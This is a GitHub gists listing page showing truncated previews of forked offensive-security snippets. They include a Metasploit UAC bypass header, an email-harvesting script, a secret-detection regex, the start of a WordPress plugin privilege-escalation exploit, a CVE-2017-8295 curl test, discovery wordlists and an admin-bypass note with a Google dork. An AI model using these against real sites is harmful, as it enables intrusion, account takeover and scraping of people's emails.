Halim Jabbes hxlxmjxbbxs
🚩
hxlxmjxbbxs
/ exploit
Created
May 13, 2022 17:14
— forked from whylovejp/exploit
Windows Escalate UAC Protection Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # $Id$ | |
| ## | |
| ## | |
| # This file is part of the Metasploit Framework and may be subject to | |
| # redistribution and commercial restrictions. Please see the Metasploit | |
| # Framework web site for more information on licensing and terms of use. | |
| # http://metasploit.com/framework/ | |
| ## |
hxlxmjxbbxs
/ hunterio.sh
Created
May 14, 2022 20:29
— forked from streaak/hunterio.sh
Script to gather emails from Hunter.io API
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| total=$(curl -s "https://api.hunter.io/v2/email-count?domain=$1" | jq -r '.data.total') | |
| echo "Total is $total" | |
| if [ "$total" != "0" ]; then | |
| for (( i=0; i<=$total; i+=100 )) | |
| do | |
| echo "offset $i" | |
| curl -s "https://api.hunter.io/v2/domain-search?domain=$1&api_key=KEYHERE&limit=100&offset=$i" | jq -r '.data.emails[].value' >> hunter_emails.txt |
hxlxmjxbbxs
/ Generic keys
Created
May 21, 2022 15:47
— forked from h4x0r-dz/Generic keys
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
hxlxmjxbbxs
/ Exploit.js
Created
May 31, 2022 19:51
— forked from numanturle/Exploit.js
MasterStudy LMS – WordPress LMS Plugin 2.7.5 - Privilege Escalation (Unauthenticated)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function randomInt(min, max) { | |
| return Math.floor(Math.random() * (max - min + 1)) + min; | |
| } | |
| jQuery(document).ready(function($){ | |
| username = "poctesting"+randomInt(1,1337); | |
| password_poc = "S3cr3t"+randomInt(1,1337); | |
| nonce = stm_lms_nonces.stm_lms_register | |
| post_data = { |
hxlxmjxbbxs
/ test-WP-CVE-2017-8295.sh
Created
June 29, 2022 21:37
— forked from gustavoapolinario/test-WP-CVE-2017-8295.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # It's Work to you test if the vulnerability is working | |
| # use only to test your system | |
| # use with responsability | |
| # | |
| # use method: | |
| # test-WP-CVE-2017-8295.sh [YOUR-SITE-TO-TEST] [USER-TO-TEST] | |
| # ex: test-WP-CVE-2017-8295.sh example.com user | |
| curl --write-out %{http_code} --silent --output ~/body.txt \ |
hxlxmjxbbxs
/ params.txt
Created
July 22, 2022 00:59
— forked from nullenc0de/params.txt
List of parameters for content discovery
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 1 | |
| 11 | |
| 12 | |
| 13 | |
| 14 | |
| 15 | |
| 16 | |
| 17 | |
| 2 |
hxlxmjxbbxs
/ content_discovery_nullenc0de.txt
Created
July 22, 2022 01:02
— forked from nullenc0de/content_discovery_nullenc0de.txt
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| / | |
| $$$lang-translate.service.js.aspx | |
| $367-Million-Merger-Blocked.html | |
| $defaultnav | |
| ${idfwbonavigation}.xml | |
| $_news.php | |
| $search2 | |
| £º | |
| .0 | |
| /0 |
hxlxmjxbbxs
/ all.txt
Created
July 22, 2022 01:02
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
hxlxmjxbbxs
/ content_discovery_all.txt
Created
July 22, 2022 01:04
— forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ |
hxlxmjxbbxs
/ Exploits
Created
July 25, 2022 04:33
— forked from dreadpiratesr/Exploits
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Exploit Title: Supercon Direct login to admin panel without entering password | |
| Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices” | |
| Product Description | |
| ——————- | |
| Supercon delivers high quality, reliable and cost-effective IT services to customers globally. | |
| We provide world-class technology services by constantly exploring and implementing innovative | |
| solutions that drive long-term value to our customers. We have been providing solutions to clients | |
| across the globe for more than 5 years and boast of our extensive | |
| experience on website designing and development projects. |
OlderNewer